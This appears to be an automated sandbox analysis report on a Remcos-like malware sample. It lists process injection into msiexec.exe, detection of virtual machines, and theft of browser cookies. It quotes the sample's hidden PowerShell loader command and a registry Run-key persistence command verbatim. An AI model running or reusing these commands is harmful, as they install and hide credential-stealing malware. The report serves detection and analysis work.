              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\qga\qga.exe
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Program Files\qga\qga.exe
              Source: powershell.exe, 00000002.00000002.144031424446.00000000089BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXETAMPP
              Source: powershell.exe, 00000002.00000002.144025287826.0000000006F00000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148892443285.0000000006D40000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: `BC:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9871
              Source: C:\Windows\SysWOW64\msiexec.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_4-22173
              Source: C:\Windows\SysWOW64\msiexec.exe API coverage: 8.4 %
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 5004 Thread sleep count: 272 > 30
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 5004 Thread sleep time: -136000s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 2088 Thread sleep time: -33000s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 7820 Thread sleep count: 39 > 30
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 2088 Thread sleep count: 9376 > 30
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 2088 Thread sleep time: -28128000s >= -30000s
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: C:\Users\user\Desktop\rPO3799039985.exe Code function: 0_2_00406033 FindFirstFileA,FindClose
              Source: C:\Users\user\Desktop\rPO3799039985.exe Code function: 0_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
              Source: C:\Users\user\Desktop\rPO3799039985.exe Code function: 0_2_00402688 FindFirstFileA
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_214D5C00 FindFirstFileW,FindNextFileW,FindNextFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_214D7E20 Sleep,FindFirstFileW,RemoveDirectoryW,FindNextFileW,RemoveDirectoryW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_214D73F0 FindFirstFileW,FindNextFileW,LdrInitializeThunk,CreateFileW,FindNextFileW,FindClose,CloseHandle,FindClose
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_214E8AD0 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_21DE10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_21DE6580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_0040AE51 FindFirstFileW,FindNextFileW
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_00418981 memset,GetSystemInfo
              Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\
              Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
              Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
              Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
              Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\
              Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\Badefaciliteter140\
              Source: powershell.exe, 00000002.00000002.144042973723.000000000A169000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
              Source: powershell.exe, 00000002.00000002.144025287826.0000000006F00000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148892443285.0000000006D40000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: `bC:\Program Files\Qemu-ga\qemu-ga.exe
              Source: powershell.exe, 00000002.00000002.144042973723.000000000A169000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
              Source: powershell.exe, 00000002.00000002.144042973723.000000000A169000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
              Source: powershell.exe, 00000002.00000002.144042973723.000000000A169000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
              Source: msiexec.exe, 00000004.00000002.148892015439.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144377552368.00000000054A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWXk
              Source: powershell.exe, 00000002.00000002.144042973723.000000000A169000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
              Source: powershell.exe, 00000002.00000002.144042973723.000000000A169000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
              Source: powershell.exe, 00000002.00000002.144042973723.000000000A169000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
              Source: powershell.exe, 00000002.00000002.144031424446.00000000089BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exetampp
              Source: msiexec.exe, 00000004.00000003.144377806392.0000000005479000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148892015439.0000000005479000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148892015439.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144377552368.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000F.00000002.144309224409.0000014B7C7A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: msedge.exe, 0000000F.00000002.144309130186.0000014B7C780000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWMSCTFIME Composition{|K
              Source: powershell.exe, 00000002.00000002.144042973723.000000000A169000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
              Source: powershell.exe, 00000002.00000002.144042973723.000000000A169000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
              Source: msedge.exe, 0000000F.00000002.144307250595.0000014B7A861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
              Source: powershell.exe, 00000002.00000002.144042973723.000000000A169000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
              Source: powershell.exe, 00000002.00000002.144042973723.000000000A169000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
              Source: chrome.exe, 00000008.00000002.144250991342.0000022E9823B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\rPO3799039985.exe API call chain: ExitProcess graph end node graph_0-3269
              Source: C:\Users\user\Desktop\rPO3799039985.exe API call chain: ExitProcess graph end node graph_0-3108
              Source: C:\Windows\SysWOW64\msiexec.exe API call chain: ExitProcess graph end node
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe System information queried: ModuleInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0310F288 LdrInitializeThunk,LdrInitializeThunk
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_214DD8D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_214D7240 GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_214E4BBC mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_21DE4AB4 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_214E9ACA GetProcessHeap
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
              Source: C:\Windows\SysWOW64\msiexec.exe Process token adjusted: Debug
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_214DD8D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_214DB299 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_214DAFD4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_21DE60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_21DE2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_21DE2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Section loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe protection: readonly
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 44F0000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Besmears" /t REG_EXPAND_SZ /d "%billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)"
              Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\xocgcuufvngxpkogqqu"
              Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\hihycffzjvycrqdkhbgvqc"
              Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\rlmjdxqbxdqhcwrorltxbhbpx"
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Besmears" /t REG_EXPAND_SZ /d "%billigbogs% -windowstyle 1 $Cosier=(gp -Path 'HKCU:\Software\Curetted\').konvolutternes;%billigbogs% ($Cosier)"
              Source: C:\Users\user\Desktop\rPO3799039985.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$polysaccum=get-content -raw 'c:\users\user\appdata\local\temp\badefaciliteter140\head158\rekvireringen\martyrization.pra121';$sikkerhedsforvaringernes=$polysaccum.substring(72097,3);.$sikkerhedsforvaringernes($polysaccum)
              Source: msiexec.exe, 00000004.00000003.144282569445.0000000021204000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144285024382.0000000021204000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144281842172.0000000021204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
              Source: msiexec.exe, 00000004.00000002.148892015439.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144377552368.00000000054A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager 1 - Microsoft
              Source: msiexec.exe, 00000004.00000002.148891816559.0000000005462000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managernutes }
              Source: msiexec.exe, 00000004.00000002.148899066974.000000002115E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager0
              Source: msiexec.exe, 00000004.00000003.144377552368.00000000054A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerr]
              Source: msiexec.exe, 00000004.00000002.148899066974.000000002115E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerr|
              Source: msiexec.exe, 00000004.00000002.148899338985.0000000021204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerL.)?
              Source: msiexec.exe, 00000004.00000002.148891816559.0000000005462000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerinutes }
              Source: msiexec.exe, 00000004.00000002.148899338985.0000000021204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerX.
              Source: msiexec.exe, 00000004.00000002.148899066974.000000002115E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerWQ\/
              Source: msiexec.exe, 00000004.00000002.148892015439.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148899066974.0000000021140000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
              Source: msiexec.exe, 00000004.00000002.148899338985.0000000021204000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerS.
              Source: msiexec.exe, 00000004.00000002.148899066974.000000002115E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerWQ\
              Source: msiexec.exe, 00000004.00000002.148892015439.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144377552368.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, logs.dat.4.dr Binary or memory string: [Program Manager]
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_214DAE1D cpuid
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
              Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_214DB15B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy
              Source: C:\Users\user\Desktop\rPO3799039985.exe Code function: 0_2_00405D51 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA

              Stealing of Sensitive Information

Source: Yara match | File source: 00000004.00000003.144377552368.0000000005496000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.148892015439.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.144377552368.00000000054E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.144376861712.0000000005496000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.148899066974.0000000021140000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.148889275088.000000000327F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.148892015439.0000000005496000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.144376861712.00000000054E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 5024, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite
